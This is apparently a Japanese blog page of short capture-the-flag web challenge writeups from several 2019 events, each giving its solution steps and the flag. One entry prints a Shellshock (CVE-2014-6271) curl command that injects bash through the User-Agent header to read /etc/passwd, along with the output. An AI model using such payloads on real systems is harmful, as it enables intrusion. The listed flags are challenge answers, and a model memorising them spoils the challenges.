Web

UUT CTF writeup Bad JS

Bad JS

100

Web

There is a bad JS which hides flag inside. Capture it.

Chromeで表示して開発者ツールを起動するとdebuggerで停止してしまうので、JS.jsファイル中の'\x64\x65\x62\x75'='debu'を空文字列''に置換、'\x67\x67\x65\x72'='gger'を空文字列''に置換します。
再度、Chromeで表示してブレークポイントを設定し、先頭にある_0x1b00の内容を参照します。Base64でエンコードされていますので、怪しいものを1つずつデコードしていくと、_0x1b00[48]="RmxhZyBpczogTUQ1KDEyNy4wLjAuMSk="が次の文字列にデコードできます。
Flag is: MD5(127.0.0.1)
MD5ハッシュ値を求めます。
f528764d624db129b32c21fbca0cb8d6
フラグは、
UUTCTF{f528764d624db129b32c21fbca0cb8d6}
です。



UUT CTF writeup Web WarmUp

Web WarmUp

10

Literally, find the flag!

解凍するとhtmlファイルができます。ブラウザで表示して選択するとフラグが見えます。
フラグは、
UUTCTF{P0SCon: Welcome to UUTCTF! Happy hacking ;)}
です。



ångstromCTF 2019 writeup Control You

Control You

Web
20
1205

Only those who give us the flag are exempt from our control.

リンク先のページのソースを表示するとフラグが記載されています。
<script>
function stop() {
if (flag.value === "actf{control_u_so_we_can't_control_you}") {
document.body.style.background = "red";
}
}
</script>
フラグは、
actf{control_u_so_we_can't_control_you}
です。




SwampCTF 2019 writeup Brokerboard

Brokerboard

183

It's the year 1997 and the Internet is just heating up! :fire:

In order to get ahead of the curve, SIT Industries® has introduced it's first Internet product: The Link Saver™. SIT Industries® has been very secretive about this product - even going so far to hire Kernel Sanders® to test the security!

However, The Kernel discovered that The Link Saver had a little bit of an SSRF problem that allowed any user to fetch the code for The Link Saver™ from https://localhost/key and host it themselves :grimacing:. Fortunately, with a lil' parse_urlmagic, SIT Industries® PHP wizards have patched this finding from Kernel Sanders® and are keeping the code behind this wonderful site secure!

... or have they? :wink:

chal1.swampctf.com:1244

-= Created by andrewjkerr =-

入力したURLのホスト名がlocalhostだと受け付けないようです。parse_url()関数の脆弱性でホスト名を誤って解釈させることができるようです。次のように入力するとフラグが表示されます。

1

フラグは、
flag{y0u_cANn0t_TRU5t_php}
です。



RADARCTF writeup MD5Play2

  • MD5Play2
  • Points: 100
  • Type: Web
  • Solves: 159
  • Download
Just understand the code ;)

--------------------------------------------
Challenge's URL : 
http://blackfoxs.org/radar/md5play
URLにアクセスするとphpのソースコードが表示されます。
<?php
if(!isset($_GET['md5'])){die(highlight_file(__FILE__));}
if (isset($_GET['md5']) and strlen($_GET['md5']) == 3 and !is_numeric($_GET['md5'])){
    $md5=$_GET['md5'];
    if (floatval($md5)==md5($md5)){
        die(highlight_file("flag.php"));
    }else{
        echo htmlspecialchars($md5)."!=",md5($md5);
    }
}else{die(highlight_file(__FILE__));}
?> 1
GETパラメータのmd5が3文字で数値ではなくmd5のハッシュ値の先頭が数字でなければフラグが表示されそうです。eeeのMD5ハッシュ値はd2f2297d6e829cd3493aa7de4416a18fですのでeeeを指定してみます。
<?php
$flag='radar{s0m3_bug5_1s_fun}';
?> 1
フラグは、
radar{s0m3_bug5_1s_fun}

Pragyan CTF 2019 writeup Game of Faces

Game of Faces

100

The Game of Faces, welcomes you. In this era, where AIs generate a lot of faces, we would like you to contribute to the same by uploading your image. Thank you for contributing, to continue.

http://159.89.166.12:15000/

URLにアクセスします。htmlソースを確認すると<form>要素がありますが表示されていません。したがって、下記のようにhtmlソースから<form>要素のみを抽出してブラウザで表示します。
  <form action='http://159.89.166.12:15000/' method = "GET" target="resultFrame">
              Upload Your Profile Picture : <input type="file" name="profile_pic" >
              <input type="submit" value="Upload Image" name="submit">
          </form>
適当なファイルをアップロードすると次のBase64エンコード文字列が表示されます。
VGhlX3Njcm9sbF9zYXlzPXRoZV9uaWdodF9raW5nVlN2YWx5cmlhbi50eHQ=
Base64でデコードすると次の文字列になります。
The_scroll_says=the_night_kingVSvalyrian.txt
http://159.89.166.12:15000/the_night_kingVSvalyrian.txtにアクセスするとフラグが表示されます。

1

フラグは、
pctf{You_L00K_Wi3Rd_IN_H3R3}

Pragyan CTF 2019 writeup Cookie Monster

Cookie Monster

100

Do prepare to see cookies lurking everywhere. http://159.89.166.12:13500/


URLにアクセスするとCookie変数flagがセットされアクセスするたびに値が変わります。セットされる値はMD5ハッシュ値で2文字の文字列をハッシュ化したもののようです。以下のサイトで検索します。
bc54f4d60f1cec0f9a6cb70e13f2127a pc
114d6a415b3d04db792ca7c0da0c7a55 tf
b2984e12969ad3a3a2a4d334b8fb385a {c
6f570c477ab64d17825ef2d2dfcb6fe4 0o
988287f7a1eb966ffc4e19bdbdeec7c3 ki 
0d4896d431044c92de2840ed53b6fbbd 3s
f355d719add62ceea8c150e5fbfae819 _@
12eccbdd9b32918131341f38907cbbb5 re
639307d281416ad0642faeaae1f098c4 _y
96bc320e4d72edda450c7a9abc8a214f Um
c716fb29298ad96a3b31757ec9755763 _b
51de5514f3c808babd19f42217fcba49 Ut
05cb7dc333ca611d0a8969704e39a9f0 _t
bc781c76baf5589eef4fb7b9247b89a0 HE
ff108b961a844f859bd7c203b7366f8e y_
2349277280263dff980b0c8a4a10674b @l
0b1cdc9fe1f929e469c5a54ffe0b2ed5 s0
364641d04574146d9f88001e66b4410f _r
c758807125330006a4375357104f9a82 3v
fcfdc12fb4030a8c8a2e19cf7b075926 Ea
440c5c247c708c6e46783e47e3986889 L_
97a7bf81a216e803adfed8bd013f4b85 @_
c1d12de20210d8c1b35c367536e1c255 l0
a8655da06c5080d3f1eb6af7b514e309 t}
フラグは、
pctf{c0oki3s_@re_yUm_bUt_tHEy_@ls0_r3vEaL_@_l0t}
です。



Aero CTF 2019 writeup board tracking system

board tracking system

100

Мы разработали продвинутую систему отслеживания параметров борта, нет ли в ней уязвимостей?

We develop advanced board tracking system, is it vulnerable?

Site: http://81.23.11.159:8080/

URLにアクセスすると次のページが表示されます。

1

HTMLソースは次のとおりです。
<html>
<head>
<style>
body, pre {
    color: #7b7b7b;
font: 300 16px/25px "Roboto",Helvetica,Arial,sans-serif;
}
</style>
<meta name="generator" content="vi2html">
</head>
<body>
</br>
Welcome to control plane application of Aeroctf system.</br>
</br>
</br>
On a dashboard you can see loading our system</br>
</br>
Stats:
</br>
<iframe frameborder=0 width=800 height=600 src="/cgi-bin/stats"></iframe>
</body>
</html>
CVE 2014-6271の脆弱性があります。
$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://81.23.11.159:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Aero{c58b51bee681ba3aa3971cef7aa26696}
フラグは、
Aero{c58b51bee681ba3aa3971cef7aa26696}

TAMUctf 19 writeup Robots Rule

Robots Rule

277

http://web5.tamuctf.com

Difficulty: easy


robots.txtを参照してみます。次のページが表示されます。

1
Fiddlerでリクエストを編集して、User-AgentをGoogleの検索Botに変えてアクセスしてみます。

2

フラグが表示されました。
フラグは、
gigem{be3p-bOop_rob0tz_4-lyfe}
です。



TAMUctf 19 writeup Many Gig'ems to you!

Many Gig'ems to you!

341

easy

http://web7.tamuctf.com


URLにアクセスすると次のページが表示されます。
1

imgタグのaltの値を抽出してつなげると次の様になります。
gigsgigsgigsgigsgigs gigsgigsgigem{flag_in_gigsgigsgigsgigsgigsflaggigem(略)
Cookies!のリンクをクリックすると次のページが表示されます。
2
同様にimgタグのaltの値を抽出してつなげると次のようになります。
(略)cookieSc00kiecookiecookiecookiecookiesgigem{continued == source_and_cookie{gigsgigemflaggigem(略)
またこのとき次のCookieが設定されます。
gigem_continue=cookies}
hax0r=flagflagflagflagflagflag
gigs=all_the_cookies
cookie=flagcookiegigemflagcookie
よく分かりませんが、上記の赤字の文字列を組み合わせて試行錯誤したらフラグになりました。
フラグは、
gigem{flag_in_source_and_cookies}
記事検索
ギャラリー
  • TetCTF 2023 NewYearBot
  • UUT CTF writeup Find The Password
  • UUT CTF writeup The Puzzle
  • Hack Zone Tunisia 2019 writeup Microscope
  • Hack Zone Tunisia 2019 writeup Welcome
  • SwampCTF 2019 writeup Brokerboard
  • SwampCTF 2019 writeup Leap of Faith
  • SwampCTF 2019 writeup Last Transmission
  • CBM CTF 2019 writeup Long road
カテゴリー